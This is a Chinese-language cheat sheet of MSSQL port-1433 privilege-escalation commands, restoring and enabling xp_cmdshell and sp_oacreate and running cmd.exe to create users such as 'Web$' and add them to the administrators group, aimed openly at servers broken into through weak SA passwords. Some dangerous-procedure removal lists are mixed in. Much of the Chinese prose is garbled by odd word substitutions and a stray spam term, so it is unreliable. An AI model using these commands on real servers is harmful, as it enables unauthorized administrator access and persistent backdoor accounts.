1433修复命令大全提权错误大全_cmd_shell组件修复

1、连接数据库 driver={SQL
Server};server=服务器IP;uid=客户名;pwd=密码;database=数据库名
2、增加新客户 declare @shell int exec sp_oacreate
‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c net user 新用户
密码 /add’ 3、把客户加各管理组 declare @shell int exec sp_oacreate
‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup
administrators 新用户 /add’ 4、激活GUEST用户 declare @shell int exec
sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c net user guest
/active:yes’ 5、把Guest加随地理组 declare @shell int exec
sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup
Administrators Guest /add’
关于幸免措施,能够参见脚本之家庭服务务器安全设置栏目。

1433 SQL侵犯恢复生机xp_cmdshell方法计算 sql server
二〇〇七下展开xp_cmdshell的办法 EXEC sp_configure ‘show advanced options’,
1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’, 1;RECONFIGURE;
SQL2006张开’OPENROWSET’扶植的措施: exec sp_configure ‘show advanced
options’, 1;RECONFIGURE;exec sp_configure ‘Ad Hoc Distributed
Queries’,1;RECONFIGURE; SQL2005开启’sp_oacreate’协理的形式: exec
sp_configure ‘show advanced options’, 1;RECONFIGURE;exec sp_configure
‘奥莱 Automation Procedures’,1;RECONFIGURE; 突破SA的各样困难
常见事态回复实践xp_cmdshell 1 未能找到存储进度’master..xpcmdshell’.
苏醒措施:查询分离器连接后, 第一步推行:EXEC sp_addextendedproc
xp_cmdshell,@dllname =’xplog70.dll’declare @o int
第二步履行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令实施完成 2 不能够装载 DLL xpsql70.dll 或该DLL所引用的某一
DLL。原因126 复苏措施:查询分离器连接后,
第一步履行:sp_dropextendedproc “xp_cmdshell”
第二步推行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’
然后按F5键命令实行实现 3 无法在库 xpweb70.dll 中找到函数
xp_cmdshell。原因: 127(找不到钦点的次第。卡塔尔(قطر‎ 复苏措施:查询分离器连接后,
第一步实行:exec sp_dropextendedproc ‘xp_cmdshell’ 第二步施行:exec
sp_addextendedproc ‘xp_cmdshell’,’xpweb70.dll’ 然后按F5键命令施行完毕四.终极方法. 若是以上办法均不可恢复,请尝试用下边的法子直接抬高帐户:
查询抽离器连接后, 二〇〇一servser系统: declare @shell int exec sp_oacreate
‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user dell
huxifeng007 /add’ declare @shell int exec sp_oacreate
‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\winnt\system32\cmd.exe /c net localgroup
administrators dell /add’ xp或2003server系统: declare @shell int exec
sp_oacreate ‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c net user dell
huxifeng007 /add’ declare @shell int exec sp_oacreate
‘wscript.shell’,@shell output exec sp_oamethod
@shell,’run’,null,’c:\windows\system32\cmd.exe /c net localgroup
administrators dell /add’ ————– xp_cmdshell新的复原措施 删除
drop procedure sp_addextendedproc drop procedure sp_oacreate exec
sp_dropextendedproc ‘xp_cmdshell’ 恢复 dbcc addextendedproc
(“sp_oacreate”,”odsole70.dll”) dbcc addextendedproc
(“xp_cmdshell”,”xplog70.dll”State of Qatar那样能够一贯过来,不用去管sp_addextendedproc是否存在
—————————– 删除扩张存款和储蓄过进度xp_cmdshell的语句: exec
sp_dropextendedproc ‘xp_cmdshell’ 恢复cmdshell的sql语句 exec
sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’
开启cmdshell的sql语句 exec sp_addextendedproc xp_cmdshell ,@dllname
=’xplog70.dll’ 判别存款和储蓄扩大是还是不是存在 select count(*) from
master.dbo.sysobjects where xtype=’x’ and name=’xp_cmdshell’
重临结果为1就ok 恢复xp_cmdshell exec master.dbo.addextendedproc
‘xp_cmdshell’,’xplog70.dll’;select count(*) from master.dbo.sysobjects
where xtype=’x’ and name=’xp_cmdshell’ 重临结果为1就ok
不然上传xplog7.0.dll exec master.dbo.addextendedproc
‘xp_cmdshell’,’c:\winnt\system32\xplog70.dll’ 堵上cmdshell的sql语句
sp_dropextendedproc “xp_cmdshell —————- 删除sql危险存款和储蓄:
复制代码 代码如下: DROP PROCEDURE
sp_makewebtask exec master..sp_dropextendedproc xp_cmdshell exec
master..sp_dropextendedproc xp_dirtree exec
master..sp_dropextendedproc xp_fileexist exec
master..sp_dropextendedproc xp_terminate_process exec
master..sp_dropextendedproc sp_oamethod exec
master..sp_dropextendedproc sp_oacreate exec
master..sp_dropextendedproc xp_regaddmultistring exec
master..sp_dropextendedproc xp_regdeletekey exec
master..sp_dropextendedproc xp_regdeletevalue exec
master..sp_dropextendedproc xp_regenumkeys exec
master..sp_dropextendedproc xp_regenumvalues exec
master..sp_dropextendedproc sp_add_job exec
master..sp_dropextendedproc sp_addtask exec
master..sp_dropextendedproc xp_regread exec
master..sp_dropextendedproc xp_regwrite exec
master..sp_dropextendedproc xp_readwebtask exec
master..sp_dropextendedproc xp_makewebtask exec
master..sp_dropextendedproc xp_regremovemultistring exec
master..sp_dropextendedproc sp_OACreate DROP PROCEDURE
sp_addextendedproc /*不狐 附上苏醒增添存款和储蓄进程的艺术
先恢复生机sp_addextendedproc,语句如下: SQL代码: 复制代码 代码如下: create procedure
sp_addextendedproc — 1996/08/30 20:13 @functname nvarchar(517),/*
(owner.)name of function to call */ @dllname varchar(255)/* name of
DLL containing function */ as set implicit_transactions off if
@@trancount 0 begin raiserror(15002,-1,-1,’sp_addextendedproc’) return
(1) end dbcc addextendedproc( @functname, @dllname) return (0) —
sp_addextendedproc GO 再回复以上全体扩充存款和储蓄进度 SQL代码: 复制代码 代码如下: use master exec
sp_addextendedproc xp_cmdshell,’xp_cmdshell.dll’ exec
sp_addextendedproc xp_dirtree,’xpstar.dll’ exec sp_addextendedproc
xp_enumgroups,’xplog70.dll’ exec sp_addextendedproc
xp_fixeddrives,’xpstar.dll’ exec sp_addextendedproc
xp_loginconfig,’xplog70.dll’ exec sp_addextendedproc
xp_enumerrorlogs,’xpstar.dll’ exec sp_addextendedproc
xp_getfiledetails,’xpstar.dll’ exec sp_addextendedproc
sp_OACreate,’odsole70.dll’ exec sp_addextendedproc
sp_OADestroy,’odsole70.dll’ exec sp_addextendedproc
sp_OAGetErrorInfo,’odsole70.dll’ exec sp_addextendedproc
sp_OAGetProperty,’odsole70.dll’ exec sp_addextendedproc
sp_OAMethod,’odsole70.dll’ exec sp_addextendedproc
sp_OASetProperty,’odsole70.dll’ exec sp_addextendedproc
sp_OAStop,’odsole70.dll’ exec sp_addextendedproc
xp_regaddmultistring,’xpstar.dll’ exec sp_addextendedproc
xp_regdeletekey,’xpstar.dll’ exec sp_addextendedproc
xp_regdeletevalue,’xpstar.dll’ exec sp_addextendedproc
xp_regenumvalues,’xpstar.dll’ exec sp_addextendedproc
xp_regread,’xpstar.dll’ exec sp_addextendedproc
xp_regremovemultistring,’xpstar.dll’ exec sp_addextendedproc
xp_regwrite,’xpstar.dll’ exec sp_addextendedproc
xp_availablemedia,’xpstar.dll’ SQL Server 阻止了对组件 ‘xp_cmdshell’
的 过程’sys.xp_cmdshell’
的拜候,因为此组件已当作此服务器安全配置的一有的而被关门。系统管理员可以因此接收sp_configure 启用 ‘xp_cmdshell’。有关启用 ‘xp_cmdshell’
的详细音讯,请参阅 SQL Server 联机丛书中的 “外围应用配置器”。
平常扫SQL弱口令肉鸡的恋人应该遇见过如此的难题 !
接下来大家用SQL语句消除她 剖判器实行的讲话: EXEC sp_configure ‘show
advanced options’, 1;RECONFIGURE;EXEC sp_configure ‘xp_cmdshell’,
1;RECONFIGURE

net user SQLDebugger list /add 
net localgroup administrators SQLDebugger /add 

Error Message:未能找到存款和储蓄进度 ‘master..xp_cmdshell’。 

修复法:很通用的,其实遭逢 其余126 127的都能够配合修复, 

除去xplog70.dll别的的都能够用那命令修复 
[/post]xp_cmdshell新的上涨措施 
第一步先删除: 
drop procedure sp_addextendedproc 
drop procedure sp_oacreate 
exec sp_dropextendedproc ‘xp_cmdshell’ 
服务器: 消息 3701,级别 11,状态 5,行 1 
无法 除去 过程 ‘sp_addextendedproc’,因为它在系统目录中不设有。 
服务器: 消息 3701,级别 11,状态 5,过程 sp_dropextendedproc,行 18 
无法 除去 过程 ‘xp_cmdshell’,因为它在系统目录中不真实。 
第二步苏醒: 
dbcc addextendedproc (“sp_oacreate”,”odsole70.dll”) 
dbcc addextendedproc (“xp_cmdshell”,”xplog70.dll”) 
直接过来,不管sp_addextendedproc是还是不是存在 

xplog70.dll修复: 

Error Message:不只怕装载 DLL xplog70.dll 或该 DLL 所引用的某一 DLL。原因:
126(找不到钦命的模块。卡塔尔国。 

修复XPLOG70.DLL(先用文件查看下备份的目录下\x86\bin,然后把下边目录替换) 

第一步 
exec sp_dropextendedproc ‘xp_cmdshell’ 
第二步 
dbcc addextendedproc
(“xp_cmdshell”,”c:\sql2ksp4\x86\binn\xplog70.dll”) 

无法找到存款和储蓄进度 ‘master..xp_cmdshell’。 
第一步: 
create procedure sp_addextendedproc — 1996/08/30 20:13 
@functname nvarchar(517),/* (owner.)name of function to call 

*/ 
@dllname varchar(255)/* name of DLL containing function */ 
as 
set implicit_transactions off 
if @@trancount > 0 
begin 
raiserror(15002,-1,-1,’sp_addextendedproc’) 
return (1) 
end 
dbcc addextendedproc( @functname, @dllname) 
return (0) — sp_addextendedproc 
GO 
第二步: 
EXEC sp_addextendedproc xp_cmdshell,@dllname =’xplog70.dll’declare @o
int 

SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程’sys.xp_cmdshell’
的拜会,因为此组件已充任此服务器安全安顿的一局地而被关闭。系统管理员可以通过使用
sp_configure 启用 ‘xp_cmdshell’。有关启用 ‘xp_cmdshell’
的详细音讯,请参阅 SQL Server 联机丛书中的 “外围应用配置器”。 

;EXEC sp_configure ‘show advanced options’, 1 — 
;RECONFIGURE WITH OVERRIDE — 
;EXEC sp_configure ‘xp_cmdshell’, 1 — 
;RECONFIGURE WITH OVERRIDE — 
;EXEC sp_configure    ‘show advanced options’, 0 — 

去除sql危急存款和储蓄: 
DROP PROCEDURE sp_makewebtask 
exec master..sp_dropextendedproc xp_cmdshell 
exec master..sp_dropextendedproc xp_dirtree 
澳门金沙vip,exec master..sp_dropextendedproc xp_fileexist 
exec master..sp_dropextendedproc xp_terminate_process 
exec master..sp_dropextendedproc sp_oamethod 
exec master..sp_dropextendedproc sp_oacreate 
exec master..sp_dropextendedproc xp_regaddmultistring 
exec master..sp_dropextendedproc xp_regdeletekey 
exec master..sp_dropextendedproc xp_regdeletevalue 
exec master..sp_dropextendedproc xp_regenumkeys 
exec master..sp_dropextendedproc xp_regenumvalues 
exec master..sp_dropextendedproc sp_add_job 
exec master..sp_dropextendedproc sp_addtask 
exec master..sp_dropextendedproc xp_regread 
exec master..sp_dropextendedproc xp_regwrite 
exec master..sp_dropextendedproc xp_readwebtask 
exec master..sp_dropextendedproc xp_makewebtask 
exec master..sp_dropextendedproc xp_regremovemultistring 
exec master..sp_dropextendedproc sp_OACreate 
DROP PROCEDURE sp_addextendedproc 

回复扩张存款和储蓄进度的不二秘诀 
先恢复sp_addextendedproc,语句如下: 
第一: 
create procedure sp_addextendedproc — 1996/08/30 20:13 
@functname nvarchar(517),/* (owner.)name of function to call */
@dllname varchar(255)/* name of DLL containing function */ as 
set implicit_transactions off 
if @@trancount > 0    
begin 
raiserror(15002,-1,-1,’sp_addextendedproc’)    
return (1)    
end 
dbcc addextendedproc( @functname, @dllname)    
return (0) — sp_addextendedproc 
GO 

第二: 
use master    
exec sp_addextendedproc xp_cmdshell,’xp_cmdshell.dll’    
exec sp_addextendedproc xp_dirtree,’xpstar.dll’    
exec sp_addextendedproc xp_enumgroups,’xplog70.dll’    
exec sp_addextendedproc xp_fixeddrives,’xpstar.dll’    
exec sp_addextendedproc xp_loginconfig,’xplog70.dll’    
exec sp_addextendedproc xp_enumerrorlogs,’xpstar.dll’    
exec sp_addextendedproc xp_getfiledetails,’xpstar.dll’    
exec sp_addextendedproc sp_OACreate,’odsole70.dll’    
exec sp_addextendedproc sp_OADestroy,’odsole70.dll’    
exec sp_addextendedproc sp_OAGetErrorInfo,’odsole70.dll’    
exec sp_addextendedproc sp_OAGetProperty,’odsole70.dll’    
exec sp_addextendedproc sp_OAMethod,’odsole70.dll’    
exec sp_addextendedproc sp_OASetProperty,’odsole70.dll’    
exec sp_addextendedproc sp_OAStop,’odsole70.dll’    
exec sp_addextendedproc xp_regaddmultistring,’xpstar.dll’    
exec sp_addextendedproc xp_regdeletekey,’xpstar.dll’    
exec sp_addextendedproc xp_regdeletevalue,’xpstar.dll’    
exec sp_addextendedproc xp_regenumvalues,’xpstar.dll’    
exec sp_addextendedproc xp_regread,’xpstar.dll’    
exec sp_addextendedproc xp_regremovemultistring,’xpstar.dll’    
exec sp_addextendedproc xp_regwrite,’xpstar.dll’    
exec sp_addextendedproc xp_availablemedia,’xpstar.dll’ 

删除扩大存款和储蓄过进度xp_cmdshell的语句: 
exec sp_dropextendedproc ‘xp_cmdshell’ 

恢复cmdshell的sql语句 
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’ 

开启cmdshell的sql语句 
exec sp_addextendedproc xp_cmdshell ,@dllname =’xplog70.dll’ 

认清存款和储蓄增加是或不是存在 
select count(*) from master.dbo.sysobjects where xtype=’x’ and
name=’xp_cmdshell’ 
重返结果为1就ok 

恢复xp_cmdshell 
exec master.dbo.addextendedproc ‘xp_cmdshell’,’xplog70.dll’;select
count(*) from master.dbo.sysobjects where xtype=’x’ and
name=’xp_cmdshell’ 
回来结果为1就ok 
要不上传xplog7.0.dll 
exec master.dbo.addextendedproc
‘xp_cmdshell’,’c:\winnt\system32\xplog70.dll’ 

堵上cmdshell的sql语句 
sp_dropextendedproc “xp_cmdshell 

一.改正sa口令方法: 
用sql综合运用工具连接后,试行命令: 
exec sp_password NULL,’新密码’,’sa’ 
(提示:慎用!) 

二.轻巧修补sa弱口令. 

格局1:查询分离器连接后实行: 
if exists (select * from 
dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]’) and 
OBJECTPROPERTY(id, N’IsExtendedProc’) = 1) 

exec sp_dropextendedproc N'[dbo].[xp_cmdshell]’ 

GO 
然后按F5键命令推行达成 

格局2:查询抽离器连接后 
先是步施行:use master 
其次步施行:sp_dropextendedproc ‘xp_cmdshell’ 
然后按F5键命令推行完结 

不可能装载 DLL xpsql70.dll 或该DLL所援用的某一
DLL。原因126(找不到钦定模块。) 
复苏措施:查询分离器连接后, 
先是步施行:sp_dropextendedproc “xp_cmdshell” 
其次步推行:sp_addextendedproc ‘xp_cmdshell’, ‘xpsql70.dll’ 

无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因:
127(找不到钦点的次第。卡塔尔国 
光复措施:查询分离器连接后, 
首先步试行:exec sp_dropextendedproc ‘xp_cmdshell’ 
第二步实践:exec sp_addextendedproc
‘xp_cmdshell’,’xpweb70.dll’             
然后按F5键命令实行完结 

倘诺以上办法均不足恢复,请尝试用上面的办法直接助长帐户: 
查询剥离器连接后, 
2000servser系统: 
declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec
sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net user
Web hacker /add’ 

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec
sp_oamethod @shell,’run’,null,’c:\winnt\system32\cmd.exe /c net
localgroup administrators Web /add’ 

xp或2003server系统: 126错误!命令 

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec
sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net
user Web$ hacker /add’ 

declare @shell int exec sp_oacreate ‘wscript.shell’,@shell output exec
sp_oamethod @shell,’run’,null,’c:\windows\system32\cmd.exe /c net
localgroup administrators Web$ /add’ 

C:\>DIR C:\ 
SQL Server 阻止了对组件 ‘xp_cmdshell’ 的 过程’sys.xp_cmdshell’
的看望,因为此组件已当做此服务器安全安插的一部分而被关门。系统一管理理员能够通过运用
sp_configure 启用 ‘xp_cmdshell’。有关启用 ‘xp_cmdshell’
的详细新闻,请参阅 SQL Server 联机丛书中的 “外围应用配置器”。 

剖判器推行的言语: